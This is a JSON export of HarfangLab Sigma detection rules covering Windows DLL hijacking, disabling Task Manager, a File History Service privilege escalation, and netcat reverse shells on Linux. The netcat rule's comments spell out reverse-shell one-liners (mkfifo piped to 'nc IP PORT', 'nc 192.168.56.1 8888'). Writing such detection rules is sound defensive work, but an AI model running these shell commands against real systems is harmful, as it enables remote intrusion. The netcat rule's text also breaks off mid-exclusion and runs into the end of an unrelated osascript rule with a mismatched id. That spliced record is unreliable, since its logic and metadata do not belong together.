"creation_date": "2026-03-23T11:45:34.075997Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.076001Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_plasrv.yml",
"content": "title: DLL Hijacking via plasrv.exe\nid: f2d084de-19ec-4053-b8f3-b3dab54a193a\ndescription: |\n Detects potential Windows DLL Hijacking via plasrv.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers have used this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'plasrv.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\Cabinet.dll'\n - '\\mintdh.dll'\n - '\\pdh.dll'\n - '\\tdh.dll'\n - '\\wevtapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f2d084de-19ec-4053-b8f3-b3dab54a193a",
"rule_name": "DLL Hijacking via plasrv.exe",
"rule_description": "Detects potential Windows DLL Hijacking via plasrv.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers have used this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f2d6929c-142d-40dc-8ad3-c9a26eb24032",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.078910Z",
"creation_date": "2026-03-23T11:45:34.078912Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.078917Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_fvenotify.yml",
"content": "title: DLL Hijacking via fvenotify.exe\nid: f2d6929c-142d-40dc-8ad3-c9a26eb24032\ndescription: |\n Detects potential Windows DLL Hijacking via fvenotify.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers have used this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'fvenotify.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\FVEAPI.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f2d6929c-142d-40dc-8ad3-c9a26eb24032",
"rule_name": "DLL Hijacking via fvenotify.exe",
"rule_description": "Detects potential Windows DLL Hijacking via fvenotify.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers have used this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f2ec73c6-8e51-4470-918d-f2e73ffe58be",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.620310Z",
"creation_date": "2026-03-23T11:45:34.620312Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.620317Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://twitter.com/1ZRR4H/status/1575364104822444032",
"https://attack.mitre.org/techniques/T1562/001/"
],
"name": "t1562_001_disable_taskmgr.yml",
"content": "title: TaskMgr Disabled\nid: f2ec73c6-8e51-4470-918d-f2e73ffe58be\ndescription: |\n Detects the disabling of the Windows Task Manager for a said user.\n Attackers can use this registry modification to prevent users from starting the task manager, either to hide malicious payload, or to prevent users from killing it.\n It is recommended to analyze the process responsible for the registry modification as well as to look for other malicious actions on the host.\nreferences:\n - https://twitter.com/1ZRR4H/status/1575364104822444032\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2022/11/03\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.ConfigChange\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableTaskMgr'\n Details|contains: 'DWORD' # Any non-zero value works, not just DWORD (0x00000001)\n\n # When the agent is under a lot of pressure, the parent information of a process can be missing.\n # Exceptionnaly for this rule, because it triggers so frequently with a low severity, we will ignore\n # its instances where the parent is missing.\n # When the parent is missing, the ParentImage or ParentCommandLine field is also missing (it is not empty or null)\n # so we can't easily match against that.\n # Instead, we reverse the problem by requiring the ParentImage fields to contain a `\\`.\n ProcessParentImage|contains: '\\'\n\n filter_zero:\n Details: 'DWORD (0x00000000)'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s 
gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_gpo_manual:\n ProcessParentCommandLine: '?:\\windows\\system32\\mmc.exe ?:\\windows\\system32\\gpmc.msc'\n\n exclusion_ccmexec:\n ProcessOriginalFileName: 'CcmExec.exe'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_setuphost:\n ProcessImage: '?:\\$WINDOWS.~BT\\Sources\\setuphost.exe'\n\n exclusion_defender:\n ProcessImage:\n - '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\\*\\configsecuritypolicy.exe'\n - '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\\*\\msmpeng.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Microsoft Windows'\n - 'Microsoft Windows Publisher'\n - 'Microsoft Corporation'\n\n exclusion_kiosk_mode:\n ProcessCommandLine: '?:\\Windows\\system32\\svchost.exe -k AssignedAccessManagerSvc -s AssignedAccessManagerSvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_userlock:\n ProcessOriginalFileName:\n - 'UlAgent.dll'\n - 'ULAgentExe.exe'\n ProcessSignature: 'IS Decisions SA'\n\n exclusion_programfiles:\n ProcessImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_nomsecure:\n ProcessOriginalFileName: 'NomSecure.exe'\n\n exclusion_tsllksrv:\n ProcessImage:\n - '?:\\Windows\\System32\\TSLLkSrv.exe'\n - '?:\\Windows\\SysWOW64\\TSLLkSrv.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Esm Software'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f2ec73c6-8e51-4470-918d-f2e73ffe58be",
"rule_name": "TaskMgr Disabled",
"rule_description": "Detects the disabling of the Windows Task Manager for a given user.\nAttackers can use this registry modification to prevent users from starting the Task Manager, either to hide a malicious payload or to prevent users from killing it.\nIt is recommended to analyze the process responsible for the registry modification as well as to look for other malicious actions on the host.\n",
"rule_creation_date": "2022-11-03",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f2f5d12c-024a-40f1-9ee3-d10af0223d55",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.613519Z",
"creation_date": "2026-03-23T11:45:34.613522Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.613530Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/linux",
"https://gtfobins.github.io/gtfobins/nc/",
"https://www.rufflabs.com/post/anatomy-of-reverse-shell-nc-pipe/",
"https://attack.mitre.org/techniques/T1059/004/"
],
"name": "t1059_004_reverse_shell_netcat_linux.yml",
"content": "title: Reverse Shell Executed via Netcat (Linux)\nid: f2f5d12c-024a-40f1-9ee3-d10af0223d55\ndescription: |\n Detects different suspicious usages of Netcat that are related to reverse shells.\n A reverse shell is shell session that is initiated from a remote machine.\n Attackers often use reverse shell to bypass firewall restrictions.\n It is recommended to ensure the legitimacy of this execution and of the destination IP.\nreferences:\n - https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/linux\n - https://gtfobins.github.io/gtfobins/nc/\n - https://www.rufflabs.com/post/anatomy-of-reverse-shell-nc-pipe/\n - https://attack.mitre.org/techniques/T1059/004/\ndate: 2022/07/01\nmodified: 2025/09/25\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.004\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.LOLBin.Netcat\n - classification.Linux.Behavior.NetworkActivity\n - classification.Linux.Behavior.RemoteShell\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection_exec:\n Image|endswith:\n - '/nc'\n - '/nc.openbsd'\n - '/nc.traditional'\n - '/ncat'\n - '/ncat.openbsd'\n - '/ncat.traditional'\n - '/netcat'\n - '/netcat.openbsd'\n - '/netcat.traditional'\n CommandLine|contains: # TODO FIMXE: use regexp when available broadly\n - ' -e '\n - ' --exec '\n - ' --lua-exec '\n - ' -c '\n - ' --sh-exec '\n\n selection_fifo:\n CommandLine|contains:\n # mknod /tmp/backpipe p; /bin/sh /tmp/backpipe\n # mknod /tmp/backpipe p; /bin/sh '\n - 'mknod *sh*<*|*nc *|*tee'\n - 'mknod *sh*<*|*nc.*>'\n - 'mknod *sh*<*|*nc.*|*tee'\n - 'mknod *sh*<*|*netcat *>'\n - 'mknod *sh*<*|*netcat *|*tee'\n # mknod /tmp/backpipe p; nc 192.168.56.1 8888 /tmp/backpipe\n - 'mknod *nc *<*|*sh*-i*|*tee'\n - 'mknod *nc *<*|*sh*-i*>'\n - 'mknod *nc.*<*|*sh*-i*|*tee'\n - 'mknod *nc.*<*|*sh*-i*>'\n - 'mknod *netcat *<*|*sh*-i*|*tee'\n - 'mknod *netcat *<*|*sh*-i*>'\n # rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 
| nc IP PORT > /tmp/f\n - 'rm *mkfifo *cat *|*sh*-i*|*nc '\n - 'rm *mkfifo *cat *|*sh*-i*|*nc. '\n\n # Avoid false positive with script\n filter_newline:\n CommandLine|re: '.*\\n.*'\n\n exclusion_sap:\n ProcessGrandparentImage: '/usr/sap/hostctrl/exe/saposcol'\n CommandLine|contains: 'sapsysinfo.sh'\n\n # Yocto generates huge build commands that happen to match `selection_fifo` even though they aren't related\n exclusion_yocto_sdk:\n ParentImage: '/opt/yocto/*/usr/bin/make'\n\n exclusion_makefile:\n CommandLine|contains:\n - '#include ” password as string with administrator privileges’\n Image|endswith: '/osascript'\n CommandLine|contains|all:\n - 'user name'\n - 'password'\n - 'with administrator privileges'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f4b41d25-ce02-42fb-890b-c714cded1173",
"rule_name": "User's Password Validated via osascript",
"rule_description": "Detects the execution of osascript to validate a user's password.\nAdversaries may try to validate a user's password by using it in an osascript command, for instance by creating a file as the specified user.\nIt is recommended to check for other suspicious activity by the parent process.\n",
"rule_creation_date": "2024-10-18",
"rule_modified_date": "2025-01-08",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1033",
"attack.t1059.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f4ca9000-4c9d-4df0-ab1e-b67efb6d5a38",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.610158Z",
"creation_date": "2026-03-23T11:45:34.610162Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.610170Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://ssd-disclosure.com/ssd-advisory-file-history-service-fhsvc-dll-elevation-of-privilege/",
"https://nvd.nist.gov/vuln/detail/CVE-2023-35359",
"https://attack.mitre.org/techniques/T1068/"
],
"name": "t1068_suspicious_process_fhsvc.yml",
"content": "title: Suspicious Process Executed by the File History Service\nid: f4ca9000-4c9d-4df0-ab1e-b67efb6d5a38\ndescription: |\n Detects the execution of a process by the File History Service that may be a consequence of the exploitation of a local privilege escalation vulnerability (CVE-2023-35359).\n This vulnerability allows an attacker to make the File History service load an arbitrary DLL as NT AUTHORITY\\\\SYSTEM, thus granting the attacker local SYSTEM privileges.\n It is recommended to analyze the DLLs loaded by the service as well as to look for traces of malicious behavior on the host.\n Remediation actions include quarantining the DLL, killing the launched process and isolating the host.\nreferences:\n - https://ssd-disclosure.com/ssd-advisory-file-history-service-fhsvc-dll-elevation-of-privilege/\n - https://nvd.nist.gov/vuln/detail/CVE-2023-35359\n - https://attack.mitre.org/techniques/T1068/\ndate: 2023/09/04\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1068\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Exploit.CVE-2023-35359\n - classification.Windows.Exploit.Fhsvc\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n # C:\\Windows\\system32\\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc\n ProcessParentImage|endswith: '\\svchost.exe'\n ProcessParentCommandLine|contains: ' fhsvc'\n\n exclusion_werfault:\n ProcessImage:\n - '?:\\windows\\system32\\WerFault.exe'\n - '?:\\windows\\syswow64\\WerFault.exe'\n\n exclusion_svchost:\n ProcessCommandLine: '?:\\WINDOWS\\system32\\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc'\n\n exclusion_citrix:\n ProcessImage: '?:\\Program Files (x86)\\Citrix\\ICA Client\\concentr.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f4ca9000-4c9d-4df0-ab1e-b67efb6d5a38",
"rule_name": "Suspicious Process Executed by the File History Service",
"rule_description": "Detects the execution of a process by the File History Service that may be a consequence of the exploitation of a local privilege escalation vulnerability (CVE-2023-35359).\nThis vulnerability allows an attacker to make the File History service load an arbitrary DLL as NT AUTHORITY\\\\SYSTEM, thus granting the attacker local SYSTEM privileges.\nIt is recommended to analyze the DLLs loaded by the service as well as to look for traces of malicious behavior on the host.\nRemediation actions include quarantining the DLL, killing the launched process and isolating the host.\n",
"rule_creation_date": "2023-09-04",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1068"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f4d321de-b05f-4628-bea8-6f93217fe8a4",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.076754Z",
"creation_date": "2026-03-23T11:45:34.076756Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.076760Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_manage_bde.yml",
"content": "title: DLL Hijacking via manage-bde.exe\nid: f4d321de-b05f-4628-bea8-6f93217fe8a4\ndescription: |\n Detects potential Windows DLL Hijacking via manage-bde.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'manage-bde.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\profapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f4d321de-b05f-4628-bea8-6f93217fe8a4",
"rule_name": "DLL Hijacking via manage-bde.exe",
"rule_description": "Detects potential Windows DLL Hijacking via manage-bde.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f4dd90e7-abe2-4622-ba78-c21689675968",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.601143Z",
"creation_date": "2026-03-23T11:45:34.601147Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.601154Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_stordiag.yml",
"content": "title: DLL Hijacking via stordiag.exe\nid: f4dd90e7-abe2-4622-ba78-c21689675968\ndescription: |\n Detects potential Windows DLL Hijacking via stordiag.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'stordiag.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\CRYPTBASE.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f4dd90e7-abe2-4622-ba78-c21689675968",
"rule_name": "DLL Hijacking via stordiag.exe",
"rule_description": "Detects potential Windows DLL Hijacking via stordiag.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
